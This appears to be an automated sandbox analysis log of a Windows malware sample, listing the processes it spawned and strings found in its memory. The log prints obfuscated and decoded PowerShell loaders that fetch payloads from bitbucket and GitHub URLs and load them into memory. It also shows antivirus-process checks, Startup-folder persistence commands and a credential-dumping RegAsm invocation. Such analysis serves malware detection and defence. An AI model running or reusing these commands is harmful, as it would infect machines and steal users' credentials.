                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RegAsm.exe, RegAsm.exe, 00000025.00000002.1685991632.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: RegAsm.exe, RegAsm.exe, 00000026.00000002.1674778025.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RegAsm.exe, 00000025.00000002.1685991632.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: RegAsm.exe, RegAsm.exe, 00000025.00000002.1685991632.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: RegAsm.exe, RegAsm.exe, 00000025.00000002.1685991632.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: RegAsm.exe, RegAsm.exe, 00000025.00000002.1685991632.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: RegAsm.exe, 00000025.00000002.1715955652.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RegAsm.exe, RegAsm.exe, 00000025.00000002.1685991632.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Users\user\Desktop\6706e721f2c06.exe "C:\Users\user\Desktop\6706e721f2c06.exe"
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 6706e721f2c06.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exe C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exe
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeProcess created: C:\Windows\System32\cmd.exe cmd /c one.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP001.TMP\one.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 603423
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "speechesdjexpandingsoviet" Controllers
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Southampton + ..\Transition + ..\Mars + ..\Paying + ..\Clay + ..\Usually + ..\Fighters + ..\Disposition + ..\Models + ..\Semester s
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\603423\Lucas.pif Lucas.pif s
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & echo URL="C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yzbzlbqtwhlotogkfeks"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ilkgo.vbs"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr "C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr" "C:\Users\user\AppData\Local\DesignInno Innovations\H"
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 6706e721f2c06.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g